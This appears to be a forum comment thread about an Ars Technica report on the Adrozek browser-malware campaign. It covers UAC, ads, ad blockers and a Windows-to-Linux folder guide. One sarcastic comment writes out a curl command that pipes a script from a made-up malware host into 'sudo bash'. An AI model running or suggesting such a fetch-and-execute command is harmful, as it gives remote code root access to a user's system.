Major browsers are getting hit in widespread malware attacks
arstechnica.com
arstechnica.com
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.
> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.
Obligatory:
UAC is not a security feature: https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94...
And considering that UAC only protects against admin (aka root) access, this xkcd applies https://xkcd.com/1200/
the reporter should have known this
Ads could have been something that wasn't abusive but it took some pathological behavior from Google and Facebook to bring us the hell we have now.
They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones.". Hence the bind less profitable websites find themselves in.
I will be down voted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.
Now there's a good idea. Going to research how to install Thunderbirdon Linux now. I've been a windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.
On Ubuntu (and most other desktop-centric Linux distros) the installation process is going to look something like opening the "Software Center" application, searching for "Thunderbird" and clicking "Install."
Some analogous folders between Windows and Linux (the File Hierarchy Standard):
System-wide binaries (.exe) for userland software on Windows:
C:\Program Files (x86)\
C:\Program Files\
System-wide binaries for userland software on Linux:
/usr/bin/
/usr/local/bin/
System-wide configuration files on Windows:
C:\Program Data\
System-wide configuration files on Linux:
/etc/
Per-user binaries (.exe) on Windows:
C:\Users\JillS\AppData\Local\
C:\Users\JillS\AppData\Local\Programs\
Per-user binaries on Linux:
/home/jills/.local/bin/
(also various user-specified locations under /home/jills/)
Per-user configuration files on Windows:
C:\Users\JillS\
C:\Users\JillS\AppData\Roaming\
Per-user configuration files on Linux:
/home/jills/.config/
(A different location can be specified on most Linux desktop setups (i.e., those that use the X Window System) by changing environment variable $XDG_CONFIG_HOME to equal the desired location)
Admin (root) binaries on Windows:
C:\Windows\
Root (admin) binaries on Linux:
/bin/
/sbin/
The environment variable PATH works the same in principle on both Windows and Linux. On Windows you change PATH in the GUI "Edit environment variables for your account". On Linux you typically use a text editor to open one of the standard "dot" files in /home/jills/, such as .profile or .bashrc, and specify PATH in there.
EDIT:
It would help if you knew where Fedora's Thunderbird packagers put your Thunderbird email files. I think it's typically
/home/multicomp/.thunderbird/
If that's true in your case, then just find your `x1y2z3.default` folders on Windows and copy them to that Linux directory. Not sure if the `.ini` files matter, but copying those shouldn't hurt.
As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.
How can malware tamper with a system DLL without code signing setting off alarms?
“The post said that Adrozek is installed “through drive-by download.” Installer file names use the format of setup__.exe. Attackers drop a file in the Windows temporary folder”
I've said for years that ad blockers are the first line of defense against a lot of malware.